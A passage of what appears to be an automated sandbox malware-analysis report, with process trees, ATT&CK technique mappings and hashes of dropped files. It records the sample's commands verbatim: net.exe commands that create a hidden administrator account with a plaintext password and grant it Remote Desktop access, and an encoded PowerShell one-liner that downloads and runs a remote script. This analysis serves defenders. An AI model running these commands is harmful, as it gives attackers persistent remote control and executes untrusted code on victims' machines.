PID:3216
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4316

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FCICZEBD$ /ADD
1⤵
PID:4604
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FCICZEBD$ /ADD
  2⤵
  PID:3824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FCICZEBD$ /ADD
    3⤵
    PID:2100

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4888
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1756

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 1HPN1Za7
1⤵
PID:3720
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 1HPN1Za7
  2⤵
  PID:3712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 1HPN1Za7
    3⤵
    PID:2352

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:344
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:1580

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4888
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3736

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:4344
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4048 --field-trial-handle=2844,i,5640589924128028832,7963280732661142908,262144 --variations-seed-version /prefetch:8
1⤵
PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8BE4.tmp

Filesize
1KB

MD5
d7f3a9063d9096bdb5ebf64b9f2f1838

SHA1
7fb08675344e2ac3cd5c570563e97c89295b6710

SHA256
deea5c31206ef24910a59ec17a58e4bf41ff72bc7c0c181f966ff2ed78d6f274

SHA512
2e82aa94c02307b46b173a672c6725b7573fccd30ca336750b5f5b3241c71b14726d34a41a166666534766fcad83fec2ffb700dce17adf0d22fd9b25b5389d37

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igq0i2ka.4mc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
09943fef6e44c022be35da249d514723

SHA1
bbb0cb31ab3cc5cdf80cea91dc15a6fdf127a0f9

SHA256
d3fb75a7ea8a822d7ce99ae06caaf1182860ddc321142494e45d7a071193e953

SHA512
1b4ee7254f56f39b605f10c2573054f4b7256ebd512a5943acb41c23558380443cd594d11e3ba7583a7f45d401d1b684f8c94febe3567ab903724f04e01dff9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hwgbfwad\hwgbfwad.dll

Filesize
3KB

MD5
a7121d962d49b9a2debd74b8c4899973

SHA1
3a339970f99d27d72206c9916efc0cd095e62dbb

SHA256
2c4fce09b1f7f6c333c7e05348af5ffdf9d4a9fdc325dca5235cb4e7b4de6773

SHA512
f158b281b516b9b4d07ac81c020dcd2c2bc41b0bd9d4b2b142406c3af8fa0c90920c36f3c32eaa7869e5629d3d50f834980f8e7a9eb9c262da31f3a40556ccf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
b98428c062b0eab6e519248af60ba869

SHA1
429e8a43e6bdcec95e381e63ebacf32b461ffa0c

SHA256
119ca0528bef4b1ee7e16683ed3a0705648fea93379903f254ef4ef735db8193

SHA512
43098defabf2ea8d052de9a69a2a1f92ec4b4cf73c89447c8f5dac85190d7489498cc6f8b32865fb322ae1f2ab05c3f8e51905fd97b446e9e81bfbf1b089c43a

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
d9cbd823509feefe440aa85a009a5a7c

SHA1
430faab3ded95b6b494acee0739937acac80d8ce

SHA256
b94301a42868f776f5b05abdbd76fc5f13e9cf4576eb48328adddb08e8b2872a

SHA512
40ef5d5e6a4969478ca295a39659b16d618b7fd049d29780b9d05393e266a60d0725641004d896118c1af20b7f2a58ee3bb696c6b672a536acb071b4a09228ae

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIDF63.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hwgbfwad\CSC3D32D07398D24927877BC2DA1239463C.TMP

Filesize
652B

MD5
f35fef5bca0cbc4e0b2d8bdcb88b5cdf

SHA1
70c738450b1731baacd87be8c0a9834572df5087

SHA256
f974d91a6e2862b1c9abc04c285c18fab8b73d3cc0ae7a55745775d5f57f6304

SHA512
2d0c014716c508cf3485089695f0e7410fc4668609d69cb32362ffe71bd5501a45982bbb3643062eb05c22b57a3d44d3034cc290e77f832f09ad3f612362d707

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hwgbfwad\hwgbfwad.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hwgbfwad\hwgbfwad.cmdline

Filesize
369B

MD5
d5fceddd43086e4cbc4cc323609990ae

SHA1
f09e7eb6d7d37b8ff5d2686650919db9b9c46b60

SHA256
67eb3fecd9de1fe336097ec2a6a493e326e9e1e00117bb30e3201ee6fbf50d81

SHA512
0b34fbe1406fcd896f5d06f0b29cf5c7dd00e86765e9eee9f82d1a0a5bfaaed47db3c0ec03266a6ca594fd399e3637c20e438978ac370ebedd808dd7a3d7b62a

Download Submit
memory/832-51-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/832-46-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/832-47-0x000002709B340000-0x000002709B350000-memory.dmp

Filesize
64KB

Download
memory/832-48-0x000002709B340000-0x000002709B350000-memory.dmp

Filesize
64KB

Download
memory/832-49-0x000002709B340000-0x000002709B350000-memory.dmp

Filesize
64KB

Download
memory/1016-155-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/1016-50-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/1016-2-0x00000167E58A0000-0x00000167E58B0000-memory.dmp

Filesize
64KB

Download
memory/1016-1-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/1016-0-0x00000167A0000000-0x00000167A0404000-memory.dmp

Filesize
4.0MB

Download
memory/1312-53-0x0000017724280000-0x0000017724290000-memory.dmp

Filesize
64KB

Download
memory/1312-52-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/1312-54-0x0000017724280000-0x0000017724290000-memory.dmp

Filesize
64KB

Download
memory/1312-65-0x0000017724280000-0x0000017724290000-memory.dmp

Filesize
64KB

Download
memory/1312-66-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/3780-109-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/3780-148-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/3780-115-0x000002011FA10000-0x000002011FA20000-memory.dmp

Filesize
64KB

Download
memory/3780-114-0x000002011FA10000-0x000002011FA20000-memory.dmp

Filesize
64KB

Download
memory/4072-81-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-16-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-79-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-14-0x000001F3D8CB0000-0x000001F3D8CD2000-memory.dmp

Filesize
136KB

Download
memory/4072-83-0x00007FFE6B080000-0x00007FFE6B099000-memory.dmp

Filesize
100KB

Download
memory/4072-82-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-36-0x000001F3DA270000-0x000001F3DA47A000-memory.dmp

Filesize
2.0MB

Download
memory/4072-84-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-32-0x000001F3D8CA0000-0x000001F3D8CA8000-memory.dmp

Filesize
32KB

Download
memory/4072-17-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-18-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-153-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/4072-152-0x00007FFE6B080000-0x00007FFE6B099000-memory.dmp

Filesize
100KB

Download
memory/4072-149-0x000001F3D8B70000-0x000001F3D8B80000-memory.dmp

Filesize
64KB

Download
memory/4072-64-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/4072-15-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/4072-35-0x000001F3D9EE0000-0x000001F3DA056000-memory.dmp

Filesize
1.5MB

Download
memory/4344-67-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download
memory/4344-68-0x00000246342A0000-0x00000246342B0000-memory.dmp

Filesize
64KB

Download
memory/4344-69-0x00000246342A0000-0x00000246342B0000-memory.dmp

Filesize
64KB

Download
memory/4344-80-0x00007FFE5B140000-0x00007FFE5BC01000-memory.dmp

Filesize
10.8MB

Download